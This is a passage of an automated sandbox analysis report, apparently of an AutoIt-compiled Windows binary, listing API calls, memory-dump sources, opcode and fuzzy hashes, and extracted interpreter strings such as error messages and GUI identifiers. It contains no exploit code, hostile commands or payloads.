                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 8db46c84e54c1e69446bc9a9d28388ccb8d70bdad2921b57938a5c2d31857573
                                          • Instruction ID: 6d259beee1520b2dbe4cb28be40e5f55fe999031ea52bc1ed38a80a0ff759104
                                          • Opcode Fuzzy Hash: 8db46c84e54c1e69446bc9a9d28388ccb8d70bdad2921b57938a5c2d31857573
                                          • Instruction Fuzzy Hash: A5512971D01208BFDB119FA5EC4CEAEBFB9EB48320F154226F911BB2A1D6719944DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                          • SystemParametersInfoW.USER32 ref: 00DB28BC
                                          • GetSystemMetrics.USER32 ref: 00DB28C4
                                          • SystemParametersInfoW.USER32 ref: 00DB28EF
                                          • GetSystemMetrics.USER32 ref: 00DB28F7
                                          • GetSystemMetrics.USER32 ref: 00DB291C
                                          • SetRect.USER32 ref: 00DB2939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DB2949
                                          • CreateWindowExW.USER32 ref: 00DB297C
                                          • SetWindowLongW.USER32 ref: 00DB2990
                                          • GetClientRect.USER32 ref: 00DB29AE
                                          • GetStockObject.GDI32(00000011), ref: 00DB29CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DB29D5
                                            • Part of subcall function 00DB2344: GetCursorPos.USER32(?,?,00E757B0,?,00E757B0,00E757B0,?,00DB1283,00000000,00000002,00000000), ref: 00DB2357
                                            • Part of subcall function 00DB2344: ScreenToClient.USER32 ref: 00DB2374
                                            • Part of subcall function 00DB2344: GetAsyncKeyState.USER32(00000001), ref: 00DB2399
                                            • Part of subcall function 00DB2344: GetAsyncKeyState.USER32(00000002), ref: 00DB23A7
                                          • SetTimer.USER32(00000000,00000000,00000028,Function_00001256), ref: 00DB29FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer_malloc
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1557154100-248962490
                                          • Opcode ID: 61577ac9bd2c5f96da23c2564f14b047639bc67bf105bf51581fb69b5e9b7b02
                                          • Instruction ID: 59548e7f3590742c065e7ed6adfa40dd723078a677a362ba8d8bcca050277631
                                          • Opcode Fuzzy Hash: 61577ac9bd2c5f96da23c2564f14b047639bc67bf105bf51581fb69b5e9b7b02
                                          • Instruction Fuzzy Hash: F6B16072A00249EFDB14DFA9DC49BEE7BB4FB08311F104129FA16A72A0DB74D845CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                          • DragQueryPoint.SHELL32(?,?), ref: 00E3C627
                                            • Part of subcall function 00E3AB37: ClientToScreen.USER32(?,?), ref: 00E3AB60
                                            • Part of subcall function 00E3AB37: GetWindowRect.USER32 ref: 00E3ABD6
                                            • Part of subcall function 00E3AB37: PtInRect.USER32(?,?,00E3C014), ref: 00E3ABE6
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E3C690
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E3C69B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E3C6BE
                                          • _wcscat.LIBCMT ref: 00E3C6EE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E3C705
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E3C71E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E3C735
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E3C757
                                          • DragFinish.SHELL32(?), ref: 00E3C75E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E3C851
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
                                          • API String ID: 169749273-730855631
                                          • Opcode ID: db8926226959d87eee2a3e24ee68192f530ffb40292f190dac77ec02ad123a7f
                                          • Instruction ID: 7a68da9a3cce3bc7e5c9f53872e0d6985fecc75514b955a4280bb70ef52f3898
                                          • Opcode Fuzzy Hash: db8926226959d87eee2a3e24ee68192f530ffb40292f190dac77ec02ad123a7f
                                          • Instruction Fuzzy Hash: 3F617F71508304AFC701EF64DC89DABBFE8EF89750F10092EF596A21A1DB70D949CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: 85c630b828c5752205607853bb8c493ab2f65d0e1c5e95413e62c4bebedd1966
                                          • Instruction ID: 71d56edd3adb4c0fcabbbc8b14eac353ad220096ebb0c9020aad11591d6a6d7f
                                          • Opcode Fuzzy Hash: 85c630b828c5752205607853bb8c493ab2f65d0e1c5e95413e62c4bebedd1966
                                          • Instruction Fuzzy Hash: 66317231A88309E7DA14FAA0ED43EEEB7A4EB20798F241529F442711D5EE516F44CA72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VariantInit.OLEAUT32(00000000), ref: 00E17D5F
                                          • VariantCopy.OLEAUT32(00000000,?), ref: 00E17D68
                                          • VariantClear.OLEAUT32(00000000), ref: 00E17D74
                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E17E62
                                          • __swprintf.LIBCMT ref: 00E17E92
                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00E17EBE
                                          • VariantInit.OLEAUT32(?), ref: 00E17F6F
                                          • SysFreeString.OLEAUT32(00000016), ref: 00E18003
                                          • VariantClear.OLEAUT32(?), ref: 00E1805D
                                          • VariantClear.OLEAUT32(?), ref: 00E1806C
                                          • VariantInit.OLEAUT32(00000000), ref: 00E180AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                          • API String ID: 3730832054-3931177956
                                          • Opcode ID: d67cb1a0a592ea5749ba7710c5db1f327d6cd693d0268d855573bf76ae18aec1
                                          • Instruction ID: e1ec6c36178973402998eabd0cc0c6f274d09ef76d70f702b5501baa891d269b
                                          • Opcode Fuzzy Hash: d67cb1a0a592ea5749ba7710c5db1f327d6cd693d0268d855573bf76ae18aec1
                                          • Instruction Fuzzy Hash: 14D1E371A08209EBDB109F65D444BFAB7B5FF45B00F24945AE496BB284CB30ECC4DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00E3FB78), ref: 00E19E91
                                            • Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22
                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E19EB3
                                          • __swprintf.LIBCMT ref: 00E19F0C
                                          • __swprintf.LIBCMT ref: 00E19F25
                                          • _wprintf.LIBCMT ref: 00E19FDB
                                          • _wprintf.LIBCMT ref: 00E19FF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
                                          • API String ID: 311963372-1048875529
                                          • Opcode ID: 19309713b2ae754a57c3757a4ec1c26e345158e842925f2b0c5d8808b9af38b6
                                          • Instruction ID: 11d9a8aed82c4c750342b407e84c5db6562e681f4ddbfa95b40166c723c03659
                                          • Opcode Fuzzy Hash: 19309713b2ae754a57c3757a4ec1c26e345158e842925f2b0c5d8808b9af38b6
                                          • Instruction Fuzzy Hash: 08516032901609EBCF15EBA0DD46EEEBB78EF08300F540165F50A721A2DB316E99DB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00E19C7F
                                            • Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00E19CA0
                                          • __swprintf.LIBCMT ref: 00E19CF9
                                          • __swprintf.LIBCMT ref: 00E19D12
                                          • _wprintf.LIBCMT ref: 00E19DB9
                                          • _wprintf.LIBCMT ref: 00E19DD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 311963372-3080491070
                                          • Opcode ID: 6f3509b6d902f7f550eec71cdca5afb6904c6da96c528959ab8b8dceacc71ced
                                          • Instruction ID: dda9ce97aff299f1e5975de576126dd59364782a9ecfefd0ded1201af6284d67
                                          • Opcode Fuzzy Hash: 6f3509b6d902f7f550eec71cdca5afb6904c6da96c528959ab8b8dceacc71ced
                                          • Instruction Fuzzy Hash: 77513C32940609EBCF14EBA0DD56EEEBB78EF14300F500165B50A721A2DB316E99DB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00DEE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00E0F8DF
                                          • LoadStringW.USER32(00000000,?,00DEE029,00000001), ref: 00E0F8E8
                                            • Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00DEE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00E0F90A
                                          • LoadStringW.USER32(00000000,?,00DEE029,00000001), ref: 00E0F90D
                                          • __swprintf.LIBCMT ref: 00E0F95D
                                          • __swprintf.LIBCMT ref: 00E0F96E
                                          • _wprintf.LIBCMT ref: 00E0FA17
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E0FA2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 984253442-2268648507
                                          • Opcode ID: 6883e9ee253ab03d90acf2080456aab5d3b25eaa9da73e47e418366e020ba954
                                          • Instruction ID: 8140a8ce7bda7816bb08596e6561d207c9d2e467e12760e92c5f4510c3b8bd26
                                          • Opcode Fuzzy Hash: 6883e9ee253ab03d90acf2080456aab5d3b25eaa9da73e47e418366e020ba954
                                          • Instruction Fuzzy Hash: C5413972904209EBCF14FBE0DD86EEE7B78EF54300F500065F506720A6EA316E59CA71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E3C1FC
                                          • GetFocus.USER32(?,?,?,?), ref: 00E3C20C
                                          • GetDlgCtrlID.USER32 ref: 00E3C217
                                          • _memset.LIBCMT ref: 00E3C342
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E3C36D
                                          • GetMenuItemCount.USER32 ref: 00E3C38D
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E3C3A0
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E3C3D4
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E3C41C
                                          • CheckMenuRadioItem.USER32 ref: 00E3C454
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E3C489
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 1296962147-4108050209
                                          • Opcode ID: 5b47f2ac20a95bf9443ab466c8e731ee904458f1184e96a7678a59299efdcce3
                                          • Instruction ID: 514babc0d46c96aa47a37d6d3f916f72b3f8c40125b09314bb3d9460337ea71e
                                          • Opcode Fuzzy Hash: 5b47f2ac20a95bf9443ab466c8e731ee904458f1184e96a7678a59299efdcce3
                                          • Instruction Fuzzy Hash: 67817E71608301AFD714DF15C898A7BBFE4EB88718F20592EF995B7291C770D905CBA2
                                          • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DD0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DB6B0C,?,00008000), ref: 00DD0973
                                            • Part of subcall function 00DB4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DB4743,?,?,?,00DB715A,?,?,?,?,00DB108C), ref: 00DB4770
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DB6BAD
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DB6CFA
                                            • Part of subcall function 00DB586D: _wcscpy.LIBCMT ref: 00DB58A5
                                            • Part of subcall function 00DD363D: _iswctype.LIBCMT ref: 00DD3645
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_malloc_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 489323609-1018226102
                                          • Opcode ID: 875324dacd869325ca777407ccca060a4d926523b127782da346b73c75de670a
                                          • Instruction ID: a47dd75d3c9a5a072132b8dde3f22beb69a33e028f9f8929c7385f782fce743c
                                          • Opcode Fuzzy Hash: 875324dacd869325ca777407ccca060a4d926523b127782da346b73c75de670a
                                          • Instruction Fuzzy Hash: 3A026870108341DFC724EF24D881AAFBBE5EF99314F54491EF49A972A2DB30D949CB62
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • _memset.LIBCMT ref: 00E12D50
                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E12DDD
                                          • GetMenuItemCount.USER32 ref: 00E12E66
                                          • DeleteMenu.USER32(00E75890,00000005,00000000,000000F5,?,?), ref: 00E12EF6
                                          • DeleteMenu.USER32(00E75890,00000004,00000000), ref: 00E12EFE
                                          • DeleteMenu.USER32(00E75890,00000006,00000000), ref: 00E12F06
                                          • DeleteMenu.USER32(00E75890,00000003,00000000), ref: 00E12F0E
                                          • GetMenuItemCount.USER32 ref: 00E12F16
                                          • SetMenuItemInfoW.USER32 ref: 00E12F4C
                                          • GetCursorPos.USER32(?), ref: 00E12F56
                                          • SetForegroundWindow.USER32(00000000), ref: 00E12F5F
                                          • TrackPopupMenuEx.USER32(00E75890,00000000,?,00000000,00000000,00000000), ref: 00E12F72
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E12F7E
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 3993528054-0
                                          • Opcode ID: 75f39569b7aa2d0cdeb0515d64e8a188cdaa13304a7f1fa37e2c6123366f15c2
                                          • Instruction ID: 6e4e863def0be5a69c4322648526e02f31415734771cbcd64adbb9008ae63b18
                                          • Opcode Fuzzy Hash: 75f39569b7aa2d0cdeb0515d64e8a188cdaa13304a7f1fa37e2c6123366f15c2
                                          • Instruction Fuzzy Hash: 3171B170640209BEEB218F55DC49FEABF64FB04728F10121AF715BA1E1C7B15CA0D795
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DEE2A0,00000010,?,Bad directive syntax error,00E3F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E0F7C2
                                          • LoadStringW.USER32(00000000,?,00DEE2A0,00000010), ref: 00E0F7C9
                                            • Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22
                                          • _wprintf.LIBCMT ref: 00E0F7FC
                                          • __swprintf.LIBCMT ref: 00E0F81E
                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E0F88D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 1506413516-4153970271
                                          • Opcode ID: a4bfadb6383924881be166f232181d171d58cae289a2606f1c7fd52dbf0ede37
                                          • Instruction ID: 2838db56aaecad4f3519b085ede294cf9118cfcb0fcb09c4baa0869f3d428547
                                          • Opcode Fuzzy Hash: a4bfadb6383924881be166f232181d171d58cae289a2606f1c7fd52dbf0ede37
                                          • Instruction Fuzzy Hash: 04215E3294021EEBCF11AF90DC5AEED7B39FF14300F04446AF516760A2DA719A68DB71
                                          • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DB2036,?,00000000,?,?,?,?,00DB16CB,00000000,?), ref: 00DB1B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DB20D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,00DB16CB,00000000,?,?,00DB1AE2,?,?), ref: 00DB216E
                                          • DestroyAcceleratorTable.USER32 ref: 00DEBCA6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DB16CB,00000000,?,?,00DB1AE2,?,?), ref: 00DEBCD7
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DB16CB,00000000,?,?,00DB1AE2,?,?), ref: 00DEBCEE
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DB16CB,00000000,?,?,00DB1AE2,?,?), ref: 00DEBD0A
                                          • DeleteObject.GDI32(00000000), ref: 00DEBD1C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 3bb7c1ec5652b1179c0d5a9ef0fcd1b471e711bcf368920e3d122bfaaca0eaec
                                          • Instruction ID: 3df981cdd468803e3626c2b0cce04bda03111df4c289eff38ea6e0f388cde59a
                                          • Opcode Fuzzy Hash: 3bb7c1ec5652b1179c0d5a9ef0fcd1b471e711bcf368920e3d122bfaaca0eaec
                                          • Instruction Fuzzy Hash: 29618D32500B40DFDB29AF1ADD49B7A7BF1FB40312F58442AE4876A560C7B0A895DBA1
                                          • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DB25EC
                                          • GetSysColor.USER32(0000000F), ref: 00DB21D3
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 74d31e7439eaa4d1752cf9c623544e8b4da52865c5e18dbcb8edd6a400755383
                                          • Instruction ID: fca7a8587a18892b14b937d5452b512da41403dd55e9dbc96cd5be6328b9192d
                                          • Opcode Fuzzy Hash: 74d31e7439eaa4d1752cf9c623544e8b4da52865c5e18dbcb8edd6a400755383
                                          • Instruction Fuzzy Hash: 1C417C32400144EEDB259F29E889BF93B65EB06331F184266FE66DA1E6C7318C42DB75
                                          • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                            • Part of subcall function 00DB2344: GetCursorPos.USER32(?,?,00E757B0,?,00E757B0,00E757B0,?,00DB1283,00000000,00000002,00000000), ref: 00DB2357
                                            • Part of subcall function 00DB2344: ScreenToClient.USER32 ref: 00DB2374
                                            • Part of subcall function 00DB2344: GetAsyncKeyState.USER32(00000001), ref: 00DB2399
                                            • Part of subcall function 00DB2344: GetAsyncKeyState.USER32(00000002), ref: 00DB23A7
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E3BFF4
                                          • ImageList_EndDrag.COMCTL32 ref: 00E3BFFA
                                          • ReleaseCapture.USER32 ref: 00E3C000
                                          • SetWindowTextW.USER32(?,00000000), ref: 00E3C0AA
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E3C0BD
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E3C19F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$pb$pb
                                          • API String ID: 1924731296-1789618395
                                          • Opcode ID: 4b7a2c7e70b482c131882563dfc0c82c9b242f182e4b8cd0538a50c846aaa0f0
                                          • Instruction ID: cfe15fc4597f061efab55082a2b9b21859b8703e809a3f365694d2d84d93cfd2
                                          • Opcode Fuzzy Hash: 4b7a2c7e70b482c131882563dfc0c82c9b242f182e4b8cd0538a50c846aaa0f0
                                          • Instruction Fuzzy Hash: 38517D71604304EFDB04EF24CC5AFAA7BE5EF84314F14492DF595A72A2CB70A948DB62
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • _memset.LIBCMT ref: 00E12542
                                          • GetMenuItemInfoW.USER32(00E75890,000000FF,00000000,00000030), ref: 00E125A3
                                          • SetMenuItemInfoW.USER32 ref: 00E125D9
                                          • Sleep.KERNEL32(000001F4), ref: 00E125EB
                                          • GetMenuItemCount.USER32 ref: 00E1262F
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E1264B
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00E12675
                                          • GetMenuItemID.USER32(?,?), ref: 00E126BA
                                          • CheckMenuRadioItem.USER32 ref: 00E12700
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E12714
                                          • SetMenuItemInfoW.USER32 ref: 00E12735
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 7bf2b4ff2d19daca2fbe23a41c23de71a506ee99de43541e7139f11f843809d6
                                          • Instruction ID: 65f2bf10e671c848119bb36293ea5c9280d2fc3043c99a241cd1856ad95f018e
                                          • Opcode Fuzzy Hash: 7bf2b4ff2d19daca2fbe23a41c23de71a506ee99de43541e7139f11f843809d6
                                          • Instruction Fuzzy Hash: E6618EB0900249AFDB11CFA4DC889FF7BB9EB01308F14115DEA42B7291D731ADA5DB21
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E06BBF
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00E06C18
                                          • VariantInit.OLEAUT32(?), ref: 00E06C2A
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E06C4A
                                          • VariantCopy.OLEAUT32(?,?), ref: 00E06C9D
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E06CB1
                                          • VariantClear.OLEAUT32(?), ref: 00E06CC6
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00E06CD3
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E06CDC
                                          • VariantClear.OLEAUT32(?), ref: 00E06CEE
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E06CF9
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
